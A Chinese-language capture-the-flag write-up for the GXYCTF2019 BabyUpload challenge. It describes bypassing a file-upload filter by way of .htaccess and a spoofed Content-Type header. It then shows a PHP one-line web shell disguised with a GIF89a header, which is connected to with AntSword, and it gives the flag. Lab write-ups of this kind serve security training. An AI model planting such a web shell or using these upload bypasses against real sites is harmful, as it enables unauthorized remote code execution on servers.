[GXYCTF2019]BabyUpload

进入靶机我们可以看到这应该是通过文件上传一句话木马之后连接蚁剑得到flag
首先我们测试一下能上传哪些文件
我先尝试上传了.jpg文件发现显示了这样一句话不能传.jpg文件？？？

按道理来说这不合理，然后我就尝试传了另外一个.jpg文件，发现上传成功了。。。我猜测这应该是对.jpg文件的大小进行了限制。（测试之后，只要图片过小，就会报这个露骨）

尝试上传php文件

这不就限制死了，啥php，php3，php5，phtml等都用不了了，不过还有.htaccess可以试试

这里可以参考buu文件上传第四关教程，和这个很类似

buu刷题笔记之文件上传漏洞全集-Upload-labs通关手册

2022年2月28日 20:21

017615

这里就不过多赘述了，只要记得

更改Content-Type: application/octet-stream为Content-Type: image/jpeg就行

上传成功！
然后上传我们的一句话

GIF89a
<script language=\'php\'>@eval($_POST[\"muhan\"]);</script>

这里我们要改两个地方，第一个是将2.phtml改成2.jpg，第二个也是要改成image/jpeg

然后就是蚁剑链接，最后获得flag为flag{250166d4-3923-485d-a19f-00d70170f8a9}

------本文已结束，感谢您的阅读------

THE END

[GXYCTF2019]BabyUpload – buu刷题笔记